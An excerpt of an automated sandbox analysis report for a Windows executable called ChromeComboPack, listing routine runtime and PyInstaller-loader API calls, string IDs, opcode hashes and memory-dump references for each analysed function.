                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                • Opcode ID: 09dec002ca810f05fd5d7c823bfe6aa00a703a0ca75bfd1bbea9b479bbcb78f6
                                                                                                                                                                                                                                                • Instruction ID: f34dfa7e8e5dbb7fc30224453e465fc790854e0473012d111d9cb56660f29ee1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09dec002ca810f05fd5d7c823bfe6aa00a703a0ca75bfd1bbea9b479bbcb78f6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C11B922B18A8186E350AB16F85C325F2A8FB98FE4FA04274DB5D97798CF7CD504C750
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,00000000,00007FF78C9B33DE), ref: 00007FF78C9B834D
                                                                                                                                                                                                                                                • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF78C9B33DE), ref: 00007FF78C9B83AA
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9B88F0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF78C9B3A14,00000000,00007FF78C9B1965), ref: 00007FF78C9B8929
                                                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF78C9B33DE), ref: 00007FF78C9B8435
                                                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF78C9B33DE), ref: 00007FF78C9B8494
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,00000000,00007FF78C9B33DE), ref: 00007FF78C9B84A5
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,00000000,00007FF78C9B33DE), ref: 00007FF78C9B84BA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3462794448-0
                                                                                                                                                                                                                                                • Opcode ID: 637bc6f7c9f7680885116a859534d49be4f6c8cd185415c736321e4bb6400c1e
                                                                                                                                                                                                                                                • Instruction ID: b150a27cb023f1b9374ba99b2ae74404bf48f2e294c980a5b5f7071143550546
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 637bc6f7c9f7680885116a859534d49be4f6c8cd185415c736321e4bb6400c1e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0241D462B196D251EA30AB11A5442BAF3A5FF88BC4F960174DF4C57B89DE3CD500CB24
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF78C9C5DF1,?,?,?,?,00007FF78C9CB332,?,?,?,?,00007FF78C9C806B), ref: 00007FF78C9CC177
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF78C9C5DF1,?,?,?,?,00007FF78C9CB332,?,?,?,?,00007FF78C9C806B), ref: 00007FF78C9CC1AD
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF78C9C5DF1,?,?,?,?,00007FF78C9CB332,?,?,?,?,00007FF78C9C806B), ref: 00007FF78C9CC1DA
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF78C9C5DF1,?,?,?,?,00007FF78C9CB332,?,?,?,?,00007FF78C9C806B), ref: 00007FF78C9CC1EB
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF78C9C5DF1,?,?,?,?,00007FF78C9CB332,?,?,?,?,00007FF78C9C806B), ref: 00007FF78C9CC1FC
                                                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,00007FF78C9C5DF1,?,?,?,?,00007FF78C9CB332,?,?,?,?,00007FF78C9C806B), ref: 00007FF78C9CC217
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                • Opcode ID: 0e1b8dba42cafa746b7f5a28cb9c545fe0ff5145dccc782c1e7e6b68b8479e56
                                                                                                                                                                                                                                                • Instruction ID: 53a32f16a65f3200e74b4f49885900ced813875f1f402707595da832f6550814
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e1b8dba42cafa746b7f5a28cb9c545fe0ff5145dccc782c1e7e6b68b8479e56
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40118E20B0D2C242FA54B361A659139E156BF847B0FF413F4DA2F576D6DE2CE601CB20
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                • Opcode ID: 418ea1e238ba9159b4af0c063643a1e1072a19be9fd93c352edfae4455fd553e
                                                                                                                                                                                                                                                • Instruction ID: 054b20d43df85c410a73f736d7492f79cacccf3df80bf2264a9f876f1c774b66
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 418ea1e238ba9159b4af0c063643a1e1072a19be9fd93c352edfae4455fd553e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ABF06262A09A8281EB14AB64E44D3399360FF89771FE44675C66E462E8CF2CD045C730
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                • Instruction ID: 62154f65e541b857c0c2701ae66579bac1d274f453b1be923c462bf39580aca0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D11BF22E68A8349F6543128D65D37992407F54374FE5C6B4FB6E362DECE2CA8A0C128
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00007FF78C9CB487,?,?,00000000,00007FF78C9CB722,?,?,?,?,?,00007FF78C9CB6AE), ref: 00007FF78C9CC24F
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF78C9CB487,?,?,00000000,00007FF78C9CB722,?,?,?,?,?,00007FF78C9CB6AE), ref: 00007FF78C9CC26E
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF78C9CB487,?,?,00000000,00007FF78C9CB722,?,?,?,?,?,00007FF78C9CB6AE), ref: 00007FF78C9CC296
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF78C9CB487,?,?,00000000,00007FF78C9CB722,?,?,?,?,?,00007FF78C9CB6AE), ref: 00007FF78C9CC2A7
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF78C9CB487,?,?,00000000,00007FF78C9CB722,?,?,?,?,?,00007FF78C9CB6AE), ref: 00007FF78C9CC2B8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                                • Opcode ID: f093dcbc92af1e3aa367f2b6fc1c91c9a5e0268c5164b70814886a972eb1fb3e
                                                                                                                                                                                                                                                • Instruction ID: 8b1148ff9962e04ea3fbcc4a00ea3e833fb7aa3952aae73520a906e0a0233fbd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f093dcbc92af1e3aa367f2b6fc1c91c9a5e0268c5164b70814886a972eb1fb3e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA118120F0D2C242FA98B3A1A655179E155BF847B0FF453F4E93E166D6DE2CE501CB20
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                                • Opcode ID: b5f9c016544c14a61e3f8eadbcdda9750137674775a662515f0f7d7b8dd5c16a
                                                                                                                                                                                                                                                • Instruction ID: a0120c1ab6ba666fcb16b764dcc0668ade4adea1e2355054ec87e8d49129ec1a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5f9c016544c14a61e3f8eadbcdda9750137674775a662515f0f7d7b8dd5c16a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F113024F0E2C342FDA8B322A8551799145AF85774EF417F4DA3E1A2D2DD2CB641CB30
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: verbose
                                                                                                                                                                                                                                                • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                • Opcode ID: 5742ae6ca51b03e9d6fd204cb41504e479b7e72b202bc53543779a715851f7d3
                                                                                                                                                                                                                                                • Instruction ID: 94964152b473f3eed4c56dfa13554ef4adddace48504f055225176e5671fd579
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5742ae6ca51b03e9d6fd204cb41504e479b7e72b202bc53543779a715851f7d3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7891FE22A08A8685F721AE25C85077EB3A5BF40BB4FE441B6DA5D433C5DF3CE945CB21
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                • Opcode ID: 0f94fbfdb2a41be3f3cf5a79916f7e54565c06583a8995a71c4ffc2f48f318d6
                                                                                                                                                                                                                                                • Instruction ID: 5447a96a17b07159c182785f2593495fdbc7dc06f17520c0560bc90657d99bc0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f94fbfdb2a41be3f3cf5a79916f7e54565c06583a8995a71c4ffc2f48f318d6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB81B072E0C2C285F7647E29E21C27CA6A0BB10B54FF560F4DB097728DDB2DE951D622
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                • Opcode ID: ef1879a6950a8d40b8b6b13be53b940b4e1f0e07f3723e86cdcfdad74941457a
                                                                                                                                                                                                                                                • Instruction ID: e40c4c93f609272e23ceba878c35e5bc575b44e385bbb3609e54cb18a9d8b8ae
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef1879a6950a8d40b8b6b13be53b940b4e1f0e07f3723e86cdcfdad74941457a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5551E636B196A2AADB14EF15D04463CB791FB94B88FA04975EA4D47748DF7CF840C710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                • Opcode ID: 3d688b2030f6ff0abdfc3dd59f0c327938197cf645ae74c01235bdaf5d58afed
                                                                                                                                                                                                                                                • Instruction ID: b2813a9bc5cb596803a25baf3a77bd6e1201c7865f2a72e6817d95d2bb9aaf9b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d688b2030f6ff0abdfc3dd59f0c327938197cf645ae74c01235bdaf5d58afed
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA51F332908BD2AAEB74AF199444378B7A8FB44B94FA441B5EA9C437C5CF3CE450C710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                • Opcode ID: 0008505033c860c887c654c4879225e67528ed16fc7c6c3a96efc88f305ea5d8
                                                                                                                                                                                                                                                • Instruction ID: d4faecc23db6b8c16e9a3bb729f29c377aeef09bf9935a6df17611f0efbb0074
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0008505033c860c887c654c4879225e67528ed16fc7c6c3a96efc88f305ea5d8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19619E32908BC591DB61AF19E4403AAF7A4FB88B94F544275EB9D03B99DF7CE190CB10
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(FFFFFFFF,00000000,00000000,?,00000000,00007FF78C9B862F), ref: 00007FF78C9B226E
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: %ls$WARNING$[PYI-%d:%ls]
                                                                                                                                                                                                                                                • API String ID: 2050909247-3372507544
                                                                                                                                                                                                                                                • Opcode ID: 9a27952706b0edcce65802af7f1770e3887db089615dac0ef249cc8ca7ea00ce
                                                                                                                                                                                                                                                • Instruction ID: 513077376a91398c1bab1c09385f037f25a77eb3676d7890283370658e9c6f02
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a27952706b0edcce65802af7f1770e3887db089615dac0ef249cc8ca7ea00ce
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6921C232618BC291E620AB91F8552EAB364FF847C4F900176EA8D53B5AEE3CE105C750
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                                                                                • Opcode ID: ed63d01fdc9f0d7cd72e25070a387a5b046f77b67a2e02b147e50877afa29e90
                                                                                                                                                                                                                                                • Instruction ID: d0238ba67ced56ccca3245ceded310d1ec26f59be944d8f4240a438ba23f5119
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed63d01fdc9f0d7cd72e25070a387a5b046f77b67a2e02b147e50877afa29e90
